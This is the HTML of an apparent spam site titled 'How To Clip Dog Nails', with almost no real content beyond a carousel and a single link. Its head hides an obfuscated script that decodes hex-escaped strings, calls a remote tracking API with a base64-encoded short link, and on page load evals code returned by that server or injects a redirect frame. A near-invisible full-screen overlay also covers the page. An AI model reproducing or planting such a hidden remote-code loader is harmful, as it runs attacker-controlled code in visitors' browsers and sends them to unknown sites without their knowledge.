<!DOCTYPE html>
<html lang="en">

<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.0/jquery.min.js"></script>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
  
    <meta name="author" content="">

    <title>dog nail trimmers | How To Clip Dog Nails</title>
<script>
    'use strict'
	var appred = true;
	var baseurl = "aHR0cDovL3Rpbnl1cmwuY29tL2d1aWxsb3RpbmVkb2duYWlsY2xpcHBlcnN2aWRlbzc0NzYx";
	var _0x9bd5=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D"];var keyStr=_0x9bd5[0];var url=null;var redurl=null;
	var _0xf02d=["","\x65\x78\x65\x63","\x54\x68\x65\x72\x65\x20\x77\x65\x72\x65\x20\x69\x6E\x76\x61\x6C\x69\x64\x20\x62\x61\x73\x65\x36\x34\x20\x63\x68\x61\x72\x61\x63\x74\x65\x72\x73\x20\x69\x6E\x20\x74\x68\x65\x20\x69\x6E\x70\x75\x74\x20\x74\x65\x78\x74\x2E\x0A","\x56\x61\x6C\x69\x64\x20\x62\x61\x73\x65\x36\x34\x20\x63\x68\x61\x72\x61\x63\x74\x65\x72\x73\x20\x61\x72\x65\x20\x41\x2D\x5A\x2C\x20\x61\x2D\x7A\x2C\x20\x30\x2D\x39\x2C\x20\x27\x2B\x27\x2C\x20\x27\x2F\x27\x2C\x61\x6E\x64\x20\x27\x3D\x27\x0A","\x45\x78\x70\x65\x63\x74\x20\x65\x72\x72\x6F\x72\x73\x20\x69\x6E\x20\x64\x65\x63\x6F\x64\x69\x6E\x67\x2E","\x72\x65\x70\x6C\x61\x63\x65","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function decode64(_0x4719x2){var _0x4719x3=_0xf02d[0];var _0x4719x4,_0x4719x5,_0x4719x6=_0xf02d[0];var _0x4719x7,_0x4719x8,_0x4719x9,_0x4719xa=_0xf02d[0];var _0x4719xb=0;var _0x4719xc=/[^A-Za-z0-9\+\/\=]/g;if(_0x4719xc[_0xf02d[1]](_0x4719x2)){alert(_0xf02d[2]+_0xf02d[3]+_0xf02d[4])};_0x4719x2=_0x4719x2[_0xf02d[5]](/[^A-Za-z0-9\+\/\=]/g,_0xf02d[0]);do{_0x4719x7=keyStr[_0xf02d[7]](_0x4719x2[_0xf02d[6]](_0x4719xb++));_0x4719x8=keyStr[_0xf02d[7]](_0x4719x2[_0xf02d[6]](_0x4719xb++));_0x4719x9=keyStr[_0xf02d[7]](_0x4719x2[_0xf02d[6]](_0x4719xb++));_0x4719xa=keyStr[_0xf02d[7]](_0x4719x2[_0xf02d[6]](_0x4719xb++));_0x4719x4=(_0x4719x7<<2)|(_0x4719x8>>4);_0x4719x5=((_0x4719x8&15)<<4)|(_0x4719x9>>2);_0x4719x6=((_0x4719x9&3)<<6)|_0x4719xa;_0x4719x3=_0x4719x3+String[_0xf02d[8]](_0x4719x4);if(_0x4719x9!=64){_0x4719x3=_0x4719x3+String[_0xf02d[8]](_0x4719x5)};if(_0x4719xa!=64){_0x4719x3=_0x4719x3+String[_0xf02d[8]](_0x4719x6)};_0x4719x4=_0x4719x5=_0x4719x6=_0xf02d[0];_0x4719x7=_0x4719x8=_0x4719x9=_0x4719xa=_0xf02d[0]}while(_0x4719xb<_0x4719x2[_0xf02d[9]]);;return unescape(_0x4719x3)}
	var _0xce85=["\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x61\x64\x74\x72\x6B\x73\x72\x76\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x72\x75\x6E\x69\x74\x2F","\x64\x65\x74\x65\x63\x74\x65\x64","\x75\x72\x6C","\x72\x75\x6E","\x62\x6F\x64\x79","\x68\x74\x6D\x6C","\x73\x72\x63","\x61\x74\x74\x72","\x23\x72\x65\x64\x66\x72\x61\x6D\x65","\x73\x68\x6F\x77","\x67\x65\x74\x4A\x53\x4F\x4E"];$(function(){$[_0xce85[10]](_0xce85[0]+baseurl,function(_0x9bd5x1){if(!_0x9bd5x1[_0xce85[1]]){redurl=decodeURIComponent(decode64(_0x9bd5x1[_0xce85[2]]));if(appred){eval(decode64(_0x9bd5x1[_0xce85[3]]))}else {$(_0xce85[4])[_0xce85[5]](decode64(_0x9bd5x1[_0xce85[4]]));$(_0xce85[8])[_0xce85[7]](_0xce85[6],redurl);$(_0xce85[8])[_0xce85[9]]()}}})})
  </script>

    <!-- Bootstrap core CSS -->
    <link href="../../css/bootstrap.css" rel="stylesheet">

    <!-- Add custom CSS here -->
    <link href="../../css/business-casual.css" rel="stylesheet">
</head>

<body>
<div id="overlayidhide212" style="position: fixed;top: 0;left: 0;height: 99%;width: 100%;z-index: 9998;background-color: rgba(255,255,255,0.99);"><a href="#" style="color: rgb(249,249,249)" onclick='var element = document.getElementById("overlayidhide212");element.parentNode.removeChild(element);'>close</a><br></div>
    <div class="brand">How To Clip Dog Nails</div>
    <div class="address-bar"></div>

    <nav class="navbar navbar-default" role="navigation">
        <div class="container">
            <div class="navbar-header">
                <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-ex1-collapse">
                    <span class="sr-only">Toggle navigation</span>
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                </button>
                <a class="navbar-brand" href="../../index.html">How To Clip Dog Nails</a>
            </div>

            <!-- Collect the nav links, forms, and other content for toggling -->
            <div class="collapse navbar-collapse navbar-ex1-collapse">
                <ul class="nav navbar-nav">
                    <li><a href="index.html">Home</a>
                    </li>
                    <li><a href="About.html">About</a>
                    </li>
                                        <li><a href="Contact.html">Contact</a>
										<li><a href="Privacy-Policy.html">Privacy Policy</a>
                    </li>
                </ul>
            </div>
            <!-- /.navbar-collapse -->
        </div>
        <!-- /.container -->
    </nav>

    <div class="container">

        <div class="row">
            <div class="box">
                <div class="col-lg-12 text-center">
                    <div id="carousel-example-generic" class="carousel slide">
                        <!-- Indicators -->
                        <ol class="carousel-indicators hidden-xs">
                            <li data-target="#carousel-example-generic" data-slide-to="0" class="active"></li>
                            <li data-target="#carousel-example-generic" data-slide-to="1"></li>
                            <li data-target="#carousel-example-generic" data-slide-to="2"></li>
                        </ol>

                        <!-- Wrapper for slides -->
                        <div class="carousel-inner">
                            <div class="item active">
                                <img class="img-responsive img-full" src="img/slide-1.jpg" alt="">
                            </div>
                            <div class="item">
                                <img class="img-responsive img-full" src="img/slide-2.jpg" alt="">
                            </div>
                            <div class="item">
                                <img class="img-responsive img-full" src="img/slide-3.jpg" alt="">
                            </div>
                        </div>

                        <!-- Controls -->
                        <a class="left carousel-control" href="#carousel-example-generic" data-slide="prev">
                            <span class="icon-prev"></span>
                        </a>
                        <a class="right carousel-control" href="#carousel-example-generic" data-slide="next">
                            <span class="icon-next"></span>
                        </a>
                    </div>
                    <h2>
                        <small>Welcome to</small>
                    </h2>
                    <h1>
                        <span class="brand-name">How To Clip Dog Nails</span>
                    </h1>
                    <hr class="tagline-divider">
                    <h2>
                        <small>By <strong>How To Clip Dog Nails</strong></small>
                    </h2>
                </div>
            </div>
        </div>

        <div class="row">
            <div class="box">
                <div class="col-lg-12">
                    <hr>
                    <h1 class="intro-text text-center">dog nail trimmers
                    </h1>
                    <hr>
                    <img class="img-responsive img-border img-left" src="img/intro-pic.jpg" alt="">
                    <hr class="visible-xs">
                    <a href="../../Dog-Nail-Trimmers.html">Dog Nail Trimmers</a><br> 
                </div>
            </div>
        </div>

        <div class="row">
            <div class="box">
                <div class="col-lg-12">
                    <hr>
                    <h2 class="intro-text text-center">Categories <strong>and tags</strong>
                    </h2>
                    <hr>
<ul>

</ul>
<ul>

</ul>
                </div>
            </div>
        </div>

    </div>
    <!-- /.container -->

    <footer>
        <div class="container">
            <div class="row">
                <div class="col-lg-12 text-center">
                    <p>Copyright &copy; How To Clip Dog Nails 2013</p>
                </div>
            </div>
        </div>
    </footer>

    <!-- JavaScript -->
    <script src="../../js/jquery-1.10.2.js"></script>
    <script src="../../js/bootstrap.js"></script>
    <script>
    // Activates the Carousel
    $('.carousel').carousel({
        interval: 5000
    })
    </script>

</body>

</html>
